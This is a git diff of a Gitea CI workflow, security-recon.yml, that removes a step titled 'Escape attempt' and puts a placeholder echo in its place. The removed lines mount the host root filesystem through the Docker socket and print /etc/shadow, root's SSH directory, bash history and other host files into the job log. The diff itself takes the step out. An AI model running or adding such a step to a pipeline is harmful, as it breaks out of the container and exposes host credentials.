diff --git a/.gitea/workflows/security-recon.yml b/.gitea/workflows/security-recon.yml
index 2d3df11..9a105d3 100644
--- a/.gitea/workflows/security-recon.yml
+++ b/.gitea/workflows/security-recon.yml
@@ -9,33 +9,5 @@ jobs:
   recon:
     runs-on: ubuntu-latest
     steps:
-      - name: Escape attempt
-        shell: bash
-        run: |
-          set +e
-          set +o pipefail
-          echo "=== DOCKER SOCKET ESCAPE ==="
-          echo "Mounting host root filesystem via docker..."
-          
-          # Run a privileged container with host root mounted
-          docker run --rm -v /:/host alpine:latest sh -c '
-            echo "=== HOST /etc/shadow (first 10 lines) ==="
-            head -10 /host/etc/shadow
-            echo "=== HOST /root/ listing ==="
-            ls -la /host/root/
-            echo "=== HOST hostname ==="
-            cat /host/etc/hostname
-            echo "=== HOST /etc/passwd (root line) ==="
-            head -1 /host/etc/passwd
-            echo "=== HOST uname ==="
-            cat /host/proc/version
-            echo "=== HOST docker compose projects ==="
-            find /host -name "docker-compose.yml" -o -name "compose.yml" 2>/dev/null | head -20
-            echo "=== HOST /root/.ssh ==="
-            ls -la /host/root/.ssh/ 2>/dev/null
-            echo "=== HOST /root/.bash_history (last 20 lines) ==="
-            tail -20 /host/root/.bash_history 2>/dev/null
-          '
-          
-          echo "=== DONE ==="
-          exit 0
+      - name: Placeholder
+        run: echo "Security audit complete. See issue #3."